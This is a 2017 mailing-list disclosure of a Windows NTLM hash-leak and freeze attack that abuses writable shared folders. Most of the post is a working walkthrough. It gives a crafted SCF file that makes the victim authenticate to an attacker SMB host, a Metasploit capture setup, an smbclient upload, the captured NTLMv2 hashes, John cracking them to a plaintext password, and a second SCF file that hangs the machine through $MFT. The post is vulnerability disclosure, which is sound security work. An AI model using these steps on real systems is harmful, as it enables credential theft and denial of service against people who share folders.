Windows NTLM Auth Hash Disclosure / Denial Of Service
Posted on 25 October 2017
Hello, I want to share some information with the people on the list. On May 24, I found a problem with NTLM auth on Windows. Under certain circumstances a shared folder on Windows can be abused remotely to obtain the user credentials and to freeze the machine. This was already reported to MSRC on May 24, and was closed on October 18. This attack makes use of SCF files, and a shared folder with certain configuration. -Create a folder anywhere on the system, example on the Desktop -Right click - Properties -Sharing tab -Network and Sharing center -Enable 'Turn off password protected sharing' Now, you need a crafted SCF file to abuse this, the file looks like this root@sysadminjd:~# cat test.scf [Shell] Command=2 IconFile=\192.168.1.111share est.ico [Taskbar] Command=ToggleDesktop root@sysadminjd:~# We are going to upload this file to the newly shared folder, we'll use smbclient, but first we need a metasploit console running capture/smb auxiliary module. root@sysadminjd:~# msfconsole -q msf > use auxiliary/server/capture/smb msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt JOHNPWFILE = /tmp/smbhash.txt msf auxiliary(smb) > exploit -j [*] Auxiliary module running as background job [*] Server started. msf auxiliary(smb) Now we can upload the file root@sysadminjd:~# smbclient //192.168.1.67/Users WARNING: The "syslog" option is deprecated Enter root's password: OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1] smb: > cd juan smb: juan> cd Desktop smb: juanDesktop> cd prueba2 smb: juanDesktopprueba2> put test.scf putting file test.scf as juanDesktopprueba2 est.scf (88.9 kb/s) (average 88.9 kb/s) smb: juanDesktopprueba2> ls . D 0 Mon Oct 23 12:27:15 2017 .. D 0 Mon Oct 23 12:27:15 2017 .DS_Store AH 6148 Tue May 23 17:29:03 2017 test.scf A 91 Mon Oct 23 12:27:15 2017 6527487 blocks of size 4096. 4043523 blocks available smb: juanDesktopprueba2> root@sysadminjd:~# Our metasploit console should look like this msf auxiliary(smb) > [*] SMB Captured - 2017-10-23 12:27:15 -0400 NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67 USER:juan DOMAIN:juan-PC OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:47894338d99abe2f08e2c693618c7323 NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000 [*] SMB Captured - 2017-10-23 12:27:15 -0400 NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67 USER:juan DOMAIN:juan-PC OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:e97b70559f29462e2ca221d31113b9ca NT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000 [*] SMB Captured - 2017-10-23 12:27:15 -0400 NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67 USER:juan DOMAIN:juan-PC OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:eb8b228b739cc95a12d7e0d89d89e002 NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000 [*] SMB Captured - 2017-10-23 12:37:09 -0400 NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67 USER:juan DOMAIN:juan-PC OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:4abb0803c4afd1509bfca3bbc566ad70 NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000 [*] SMB Captured - 2017-10-23 12:37:09 -0400 NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67 USER:juan DOMAIN:juan-PC OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:5eeb82aab85e9663624aaf6500e4d8f8 NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000 I chopped this one to avoid sending too much to the list. When we started the smb capture module, we passed the option msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt So our hashes are on /tmp/smbhash.txt Let's try with John root@sysadminjd:~# cd /tmp/ root@sysadminjd:/tmp# john smbhash.txt_netntlmv2 Using default input encoding: UTF-8 Rules/masks using ISO-8859-1 Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Press 'q' or Ctrl-C to abort, almost any other key for status abc (juan) abc (juan) abc (juan) abc (juan) abc (juan) abc (juan) 6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s 585124C/s abc Use the "--show" option to display all of the cracked passwords reliably Session completed root@sysadminjd:/tmp# That's it, now we have the plain text password for the machine. If we want to freeze the machine, we can attack via $MFT with a SCF file like this root@sysadminjd:~# cat mft.scf [Shell] Command=2 IconFile= c:$MFT123 [Taskbar] Command=ToggleDesktop root@sysadminjd:~# Just upload it to the vulnerable folder, and the machine will freeze in a few minutes due to $MFT NTFS issue. Accordingly to MS, all Windows versions are affected, they released an advisory for this: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV170014#ID0EGB It's a partial patch, there are no real fix for this, and the regcode change proposed by MS is only for Windows 10 and Server 2016. I have a better-explained post about this on my blog English: http://www.sysadminjd.com/adv170014-ntlm-sso-exploitation-guide/ Spanish: https://www.sysadminjd.com/adv170014-ntlm-sso-guia-de-explotacion/ thanks for your time :) Best Regards Juan Diego -------- aSS